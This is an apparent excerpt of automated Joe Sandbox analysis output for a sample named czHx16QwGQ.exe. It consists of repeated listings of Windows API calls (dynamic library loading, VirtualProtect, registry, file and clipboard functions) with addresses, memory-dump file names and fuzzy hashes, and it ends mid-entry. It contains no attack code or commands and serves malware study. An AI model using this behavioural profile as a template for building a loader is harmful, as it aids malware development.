                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                                                                                  • Part of subcall function 00406752: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406769
                                                                                                                  • Part of subcall function 00406752: wsprintfW.USER32 ref: 004067A4
                                                                                                                  • Part of subcall function 00406752: LoadLibraryExW.KERNEL32(?,00000000,?), ref: 004067B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 2547128583-0
                                                                                                                • Opcode ID: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                • Instruction ID: 7b80e99db610fb1a261844a57c40f0e669857592e3492eb3b2a0c0f7ce0b312d
                                                                                                                • Opcode Fuzzy Hash: 32c59c0b14b548542ecf76b068d43d3c76fab82d66a171b1af570515759e8b4d
                                                                                                                • Instruction Fuzzy Hash: 14E086325042115BD21057745E48D3762AC9AC4704307843EF556F3041DB78DC35B66E
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402F73,C:\Users\user\Desktop\czHx16QwGQ.exe,80000000,00000003), ref: 00405EE2
                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 415043291-0
                                                                                                                • Opcode ID: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                • Instruction ID: 5201df1ff3c0a0bd0294a98706b79309786c42e99614e685d4e3591f63f4d9e2
                                                                                                                • Opcode Fuzzy Hash: 133c91a1dbaf88dbfd801214b1c0a7aa23d67a900b7421546c440c33baf3910c
                                                                                                                • Instruction Fuzzy Hash: D5D09E31254601AFEF098F20DE16F2E7AA2EB84B04F11552CB7C2940E0DA7158199B15
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403498,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004036EF,?,00000006,?,0000000A), ref: 004059A2
                                                                                                                • GetLastError.KERNEL32(?,00000006,?,0000000A), ref: 004059B0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1375471231-0
                                                                                                                • Opcode ID: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                • Instruction ID: 01a40f06620425e1c555583f7199589d3835b04f5715874dbca4219b9923c3a9
                                                                                                                • Opcode Fuzzy Hash: 2a128b8619e21daab1f352946d406dfe7ea7319ba132ee6f2f415100985951e7
                                                                                                                • Instruction Fuzzy Hash: D6C04C71216502DAF7115F31DF09B177A50AB60751F11843AA146E11A4DA349455D92D
                                                                                                                APIs
                                                                                                                • EnumWindows.USER32(00000000), ref: 73962B6B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumWindows
                                                                                                                • String ID:
                                                                                                                • API String ID: 1129996299-0
                                                                                                                • Opcode ID: 63cdb6f3f1f14af91ae49d6f708e65334542ac3f890bd71e72efbf89a0337b76
                                                                                                                • Instruction ID: 333a699422284168f91b90f30756662820e8c4b9b146b62700231a6cc4389120
                                                                                                                • Opcode Fuzzy Hash: 63cdb6f3f1f14af91ae49d6f708e65334542ac3f890bd71e72efbf89a0337b76
                                                                                                                • Instruction Fuzzy Hash: 38419FB2807609EFEB21EF65DE417D93769EB04358F30442AE48DCE280D639D8849B93
                                                                                                                APIs
                                                                                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileMove
                                                                                                                • String ID:
                                                                                                                • API String ID: 3562171763-0
                                                                                                                • Opcode ID: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                                • Instruction ID: 73a88bd3a5ced7927151e6ebce11b30d6a6a5b8b2c4e1db0cab765602213b928
                                                                                                                • Opcode Fuzzy Hash: f4993909eaaf04b4d10f0c262de6f8e1be0fd70d19c578988f2b9bef0751c49c
                                                                                                                • Instruction Fuzzy Hash: CBF09031A0851197DF10BBA54F4DD5E22509B8236CB28073BB412B21E1DAFDC542A56E
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 0040280D
                                                                                                                  • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointerwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327478801-0
                                                                                                                • Opcode ID: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                • Instruction ID: 7217e66a6bf97858787bec6454aeb19e768c89e60d383eb7a66a1db5dd3d6cef
                                                                                                                • Opcode Fuzzy Hash: 38b593970e7e5e8d656344d1d4c72dba1b6d10a1f376cfd8863b7a874be62c28
                                                                                                                • Instruction Fuzzy Hash: 8BE06D71E00104ABD710DBA5AE098AEB7B8DB84308B60403BF601B10D0CA7959518E2E
                                                                                                                APIs
                                                                                                                • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 004062AC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create
                                                                                                                • String ID:
                                                                                                                • API String ID: 2289755597-0
                                                                                                                • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                • Instruction ID: b492cd94208fe9a136032c47e7ca6226b28abdd7f17191690e67bc203102cabe
                                                                                                                • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                • Instruction Fuzzy Hash: 94E0E672010209BEDF195F50DD0AD7B371DEB04304F11492EFA06D4051E6B5AD706634
                                                                                                                APIs
                                                                                                                • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,0040345A,0040A230,0040A230,0040335E,00414ED0,00004000,?,00000000,00403208), ref: 00405F75
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                • Instruction ID: 5f0138a6a2c6563494c064dd15accf188ef387db15323854b273470b931b092f
                                                                                                                • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                • Instruction Fuzzy Hash: 7AE0EC3221025AAFDF109E959D04EFB7B6CEB05360F044836FD15E6150D675E8619BA4
                                                                                                                APIs
                                                                                                                • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00413134,0040CED0,004033DE,0040CED0,00413134,00414ED0,00004000,?,00000000,00403208,00000004), ref: 00405FA4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 3934441357-0
                                                                                                                • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                • Instruction ID: 11bffb161eade2b6c2cb4bf4b25223a29cd6195b7324502744f40ed25e3c63a9
                                                                                                                • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                • Instruction Fuzzy Hash: 20E08C3220125BEBEF119E518C00AEBBB6CFB003A0F004432FD11E3180D234E9208BA8
                                                                                                                APIs
                                                                                                                • VirtualProtect.KERNELBASE(7396505C,?,?,7396504C), ref: 739629B1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ProtectVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 544645111-0
                                                                                                                • Opcode ID: d95a9308519089d6f0997c695cc7e08944cfb4c13a2b5af81a8ede1c1377cc20
                                                                                                                • Instruction ID: aab625b1aafeca71a5f7f4071ed121f699fb602ffaf5dc38b25d025da8de6fe7
                                                                                                                • Opcode Fuzzy Hash: d95a9308519089d6f0997c695cc7e08944cfb4c13a2b5af81a8ede1c1377cc20
                                                                                                                • Instruction Fuzzy Hash: 20F092F250AA81FEC350EF2A86447193BE0B749204B64453EE19CDE241E334C448CF92
                                                                                                                APIs
                                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,00422708,?,?,004062E3,00422708,00000000,?,?,Call,?), ref: 00406279
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID:
                                                                                                                • API String ID: 71445658-0
                                                                                                                • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                • Instruction ID: 7481b87947078d819ae160a747d33610cb99cd3c2235475b1dc937127606ac98
                                                                                                                • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                • Instruction Fuzzy Hash: C1D0123210420DBBDF11AE90DD01FAB372DAF14714F114826FE06A4091D775D530AB14
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040315B,?), ref: 0040346B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 973152223-0
                                                                                                                • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                                                                                • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                                                                                • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                • Instruction ID: e4171d0a4592585bcf4a2ca6fb2eaed9aff33c093be5cb9cf1e9125a9c9e1139
                                                                                                                • Opcode Fuzzy Hash: bd7e8dc2c5871e064c502d82a01b6574672f0de651032f207fd53ed2aa40cebc
                                                                                                                • Instruction Fuzzy Hash: 0EB09235290600ABDE214B40DE49F457A62E7A4701F008178B240640B0CAB200A1DB19
                                                                                                                APIs
                                                                                                                • GlobalAlloc.KERNELBASE(?,?,7396123B,?,739612DF,00000019,739611BE,-000000A0), ref: 73961225
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2221579317.0000000073961000.00000020.00000001.01000000.00000004.sdmp, Offset: 73960000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2220811519.0000000073960000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2221828367.0000000073964000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2222689147.0000000073966000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_73960000_czHx16QwGQ.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AllocGlobal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761449716-0
                                                                                                                • Opcode ID: 98c0150f579313bbc7855d86146f1daf38b937717357d7736c3fc37dcc4b65bf
                                                                                                                • Instruction ID: 473050941e88255bdb719725b368d5bfa81f67fe9eae8cea4ed04b31c6f01d2d
                                                                                                                • Opcode Fuzzy Hash: 98c0150f579313bbc7855d86146f1daf38b937717357d7736c3fc37dcc4b65bf
                                                                                                                • Instruction Fuzzy Hash: E6B012B2A09410EFEF00ABA5CD06F353254E700301F144024F60CCC180C120C8008534
                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                                                                                • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                                                                                • GetClientRect.USER32(?,?), ref: 00405639
                                                                                                                • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                                                                                • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                                                                                • ShowWindow.USER32(?,?), ref: 004056DC
                                                                                                                • GetDlgItem.USER32(?,?), ref: 004056FD
                                                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040560B
                                                                                                                  • Part of subcall function 00404394: SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                                                                                                • GetDlgItem.USER32(?,?), ref: 0040574F
                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405764
                                                                                                                • ShowWindow.USER32(00000000), ref: 00405788
                                                                                                                • ShowWindow.USER32(?,?), ref: 0040578D
                                                                                                                • ShowWindow.USER32(?), ref: 004057D7
                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                                                                                • CreatePopupMenu.USER32 ref: 0040581C
                                                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00405850
                                                                                                                • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405869
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                                                                                • OpenClipboard.USER32(00000000), ref: 004058B1
                                                                                                                • EmptyClipboard.USER32 ref: 004058B7
                                                                                                                • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                                                                                • CloseClipboard.USER32 ref: 00405912
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2174645251.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2174625003.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174672849.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174698638.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2174810211.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_czHx16QwGQ.jbxd
                                                                                                                Similarity
